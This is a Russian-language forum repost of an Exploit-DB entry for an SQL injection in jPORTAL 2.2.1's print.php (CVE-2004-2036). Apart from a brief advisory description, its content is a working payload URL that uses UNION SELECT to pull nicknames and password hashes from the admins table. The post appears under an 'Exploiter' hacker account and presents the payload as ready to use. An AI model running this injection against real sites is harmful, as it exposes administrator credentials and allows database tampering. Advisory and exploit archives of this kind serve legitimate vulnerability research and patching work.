Exploit jPORTAL 2.2.1 - 'print.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24151
Проверка EDB
  1. Пройдено
Автор
MACIEK WIERCISKI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-2036
Дата публикации
2004-05-28
Код:
source: https://www.securityfocus.com/bid/10430/info

JPortal is reportedly affected by a remote SQL injection vulnerability in the print.inc.php script. This issue is due to a failure of the application to properly sanitize user-supplied URI input before using it in an SQL query.

As a result of this a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue. 

http://www.example.com/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
 
Источник
www.exploit-db.com

Похожие темы